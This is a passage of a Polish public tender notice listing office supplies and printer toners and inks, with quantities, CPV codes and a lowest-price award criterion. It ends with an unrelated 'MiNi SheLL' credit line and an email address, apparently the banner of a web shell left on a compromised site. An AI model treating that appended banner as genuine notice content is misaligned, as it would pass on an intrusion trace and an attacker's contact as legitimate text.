Taśma dwustronna samoprzylepna 50mmx10m	szt	9
Taśma klejąca przeźroczysta 18mm x 20m	szt	20
Taśma klejąca przeźroczysta 24mm x 20m	szt	62
Taśma pakowa, brązowa  przeznaczona do klejenia   kartonów, o dobrych właściwościach klejących, wym. 48-50mm x 50m	szt	16
Taśma pakowa, przeźroczysta, przeznaczona doklejenia   kartonów, o dobrych właściwościach klejących, wym. 48-50mm x 50m	szt	21
Taśma papierowa żółta 15mm	szt	334
Teczka kartonowa na dkumenty format A4, z kartonu jednostronnie powlekanego, z gumką 	szt	500
Teczka kartonowa na dokumenty format A4, z kartonu jednostronnie powlekanego, wiązana 	szt	200
Teczka skrzydłowa z gumką na dokumenty o formacie A4	szt	44
Tusz do stępli, wodny, bezolejowy do stempli gumowych i polimerowych, kolor do wybory przy zamówieniu	szt	28
toner ( tusz - wałeczek nasączony tuszem) pasujący do kalkulatora drukującego CITIZEN CX 123 (posiadanego przez Zamawiającego) drukujący w kolorze czarnym i czerwonym 	szt.	9
Wkład wymienny do pióra żelowego z pozycji 62 grubość lini pisma: 0,6 mm	szt	160
Zakreślacz, końcówka ścięta, nieblaknący i nietoksyczny tusz na bazie wody, przeznaczony do  pisania  na  wszystkich  rodzajach  papieru,   duża odporność na wysychanie, szerokość lini 2-5 mm, kolor do wybory przy zamówieniu	szt	24
Zeszyt twarda okładka, format A5, papier o gramaturze 60g/m2, laminowany w twardej oprawie,  w kratkę, 32 kartkowy	szt.	10
Zeszyt twarda okładka, format B5, papier o gramaturze 60g/m2, laminowany w twardej oprawie, w kratkę, 150 kartkowy	szt.	21
Zeszyt, twarda okładka format A4, papier o gramaturze 60g/m2, laminowany w twardej oprawie,  w kratkę, 96 kartkowy	szt.	200
Zeszyt, twarda okładka, format A5, papier o gramaturze 60g/m2, laminowany w twardej oprawie,  w kratkę, 96 kartkowy	szt.	250
Zszywacz wykonany z tworzywa sztucznego, częsci mechaniczne z metalu, zszywa min. 25 kartek zszywkami 24/6,  minimum 2 lata gwarancji	szt	24
Zszywacz wykonany z wysokiej jakości wytrzymałego tworzywaczęsci mechaniczne z metalu,  zszywa min.   60  kartek przy  stosunkowo niewielkim  nacisku, zszywki  23/8-11, minimum 2 lata gwarancji	szt	6
Zszywki 24/6 z materiału wysokiej jakości, końcówki zaostrzone, aby łatwiej przebijać zszywany plik, charakteryzują się dużą wytrzymałością na rozciąganie, opakowanie 1000 szt., 	op	320
Zszywki23/8-ll z materiału wysokiej jakości, końcówki zaostrzone, aby łatwiej przebijać zszywany plik, charakteryzują się dużą wytrzymałością na rozciąganie, opakowanie 1000 szt,	op	20
Taśma do numeratora LABEL POINT 150 ,  12mmx7m 1/2x23 black/white 	rolka	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> tusze i tonery do drukarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Farba Riso RX 200 E oryginał 	szt.	10
HP LaserJet 1160  Wydajność tonerów wg normy ISO/IEC 19752	    szt.	2
LEXMARK E 260 Wydajność tonerów wg normy ISO/IEC 19752  	    szt.	25
LEXMARK E 360  Wydajność tonerów wg normy ISO/IEC 19752 	    szt.	5
Tasma Epson Lx 300-800 	    szt.	15
Taśma do OKI MIROCLINE 3391 	    szt.	25
TONER DO HP 1010 Wydajność tonerów wg normy ISO/ICE19752	szt	80
TONER DO HP Laser Jet 1005 Wydajność tonerów wg normy ISO/ICE19752	szt	17
TONER DO HP-1100 Wydajność tonerów wg normy ISO/IEC 19752 	    szt.	40
TONER DO HP-1200 Wydajność tonerów wg normy ISO/IEC 19752 	    szt.	30
TONER DO HP-2015 Wydajność tonerów wg normy ISO/IEC 19752	    szt.	15
TONER DO HP-2200 Wydajność tonerów wg normy ISO/IEC 19752 	    szt.	25
TONER DO HP-Laser Jet 2035 Wydajność tonerów wg normy ISO/IEC 19752 	    szt.	6
TONER DO HP-Color  Laser Jet 2605 (czarny). Wydajność tonerów wg normy ISO/IEC 19752orginał lub równoważny	    szt.	1
TONER DO HP-Color  Laser Jet 2605 (czerwony). Wydajność tonerów wg normy ISO/IEC 19752 orginał 	    szt.	1
TONER DO HP-Color  Laser Jet 2605 (niebieski). Wydajność tonerów wg normy ISO/IEC 19752 orginał 	    szt.	1
TONER DO HP-Color  Laser Jet 2605 (żółty). Wydajność tonerów wg normy ISO/IEC 19752 orginał	    szt.	1
TONER DO MITA KYOCERA KM Wydajność tonerów wg normy ISO/IEC 19752  orginał 	    szt.	18
TONER DO OKI 10EX TYP 5 Wydajność tonerów wg normy ISO/IEC 19752	    szt.	1
TONER DO SAMSUNG 4200 Wydajność tonerów wg normy ISO/IEC 19752	    szt.	5
TONER DO TOSHIBA 1360/1370 Wydajność tonerów wg normy ISO/IEC 19752	    szt.	3
Tusz do  HP-DescJet 920C (czarny) zamiennik	    szt.	6
Tusz do Epson sx405 Stylus oryginał (czarny) 	    szt.	15
Tusz do Epson sx405 Stylus oryginał (czerwony)	    szt.	5
Tusz do Epson sx405 Stylus oryginał (niebieski) 	    szt.	5
Tusz do Epson sx405 Stylus oryginał (żółty)	    szt.	5
Tusz DO HP 845C DeskJet (czarny) zamiennik	    szt.	2
Tusz do HP DescJet 3820 (czarny) zamiennik	    szt.	4
Tusz do Brother LC980BK - kolor czarny  oryginał	    szt.	10
Tusz do Brother LC980C - kolor czerwony  oryginał	    szt.	5
Tusz do Brother LC980M - kolor niebieski oryginał	    szt.	5
Tusz do Brother LC980Y - kolor żółty  oryginał	    szt.	5
Toner HP 703 color 	    szt.	4
Toner HP 703 czarny 	    szt.	40
Toner HP 1606 	    szt.	12
Tusz HP color 342	    szt.	2
Tusz HP czarny 338	    szt.	2
Toner Konica Minolta Magic 	    szt.	3
Toner Konica Minolta Color 	    szt.	9
Canon BJC 2000	    szt.	3
Toner Brother HL 5240 L oryginał	    szt.	4
Toner 2300	    szt.	50
Toner Rikoh 1250	    szt.	2
Toner Samsung CLP 320	    szt.	3
Toner Samsung CLP 321	    szt.	3
Toner Samsung CLP 322	    szt.	3
Toner Samsung CLP 323	    szt.	3
Tusz LC 985 czarny 	    szt.	30
Tusz LC 985 czerwony	    szt.	6
Tusz LC 985 niebieski	    szt.	6
Tusz LC 985 zółty	    szt.	6
HP 1102 W	    szt.	10
Konica Minolta C 350 ( bizhub) czarny 	    szt.	15
Konica Minolta C 350 ( bizhub) czerwony 	    szt.	7
Konica Minolta C 350 ( bizhub) niebieski 	    szt.	7
Konica Minolta C 350 ( bizhub) zółty 	    szt.	7
Wszystkie tusze i tonery, poza określonymi słowem /oryginał/ mogą być w postaci zamienników. Zamienniki muszą być fabrycznie nowe, nie regenrowane. W przypadku uszkodzenia drukarki, będącego wynikiem użytkowania zamiennika dostawca będzie zobowiązany do naprawy lub wymiany urządzenia na sprawne na własny koszt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com